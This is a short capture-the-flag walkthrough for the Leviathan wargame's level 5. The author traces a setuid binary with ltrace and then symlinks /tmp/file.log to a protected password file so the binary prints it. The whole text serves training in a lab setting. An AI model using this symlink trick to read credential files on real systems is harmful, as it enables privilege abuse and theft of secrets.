The single executable in this level produces an error message when we try to run it. It wants to open a file called /tmp/file.log. After verifying that it wasn’t there, I tried creating an empty file and ran the program to see what would happen. I’m not quite sure what the program is doing at this point, but it seems to have deleted my file. After I create the file and also add some content, it looks like level5 is just catting the contents of the file. I go ahead and create a symbolic link to the leviathan6 password and name it /tmp/file.log, and I’m awarded with the next password.
It’s actually a little weird how easy this level was. The second level was similar, but much more difficult due to the fact that it checked permssions on the file it was catting.
leviathan5@leviathan:~$ ls
leviathan5
leviathan5@leviathan:~$ file ./leviathan5
./leviathan5: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=c628afab3b095914570d9b19a35ea05ca1e53371, not stripped
leviathan5@leviathan:~$ ./leviathan5
Cannot find /tmp/file.log
leviathan5@leviathan:~$ file /tmp/file.log
/tmp/file.log: ERROR: cannot open `/tmp/file.log' (No such file or directory)
leviathan5@leviathan:~$ touch /tmp/file.log
leviathan5@leviathan:~$ ./leviathan5
leviathan5@leviathan:~$ cat /tmp/file.log
cat: /tmp/file.log: No such file or directory
leviathan5@leviathan:~$ touch /tmp/file.log
leviathan5@leviathan:~$ ltrace ./leviathan5
__libc_start_main(0x80485ed, 1, 0xffffd7f4, 0x8048690 <unfinished ...>
fopen("/tmp/file.log", "r") = 0x804b008
fgetc(0x804b008) = '\377'
feof(0x804b008) = 1
fclose(0x804b008) = 0
getuid() = 12005
setuid(12005) = 0
unlink("/tmp/file.log") = 0
+++ exited (status 0) +++
leviathan5@leviathan:~$ echo "Hey I'm a file" > /tmp/file.log
leviathan5@leviathan:~$ ./leviathan5
Hey I'm a file
leviathan5@leviathan:~$ ln -s /etc/leviathan_pass/leviathan6 /tmp/file.log
leviathan5@leviathan:~$ ./leviathan5
XXXXXXXXXXX
leviathan5@leviathan:~$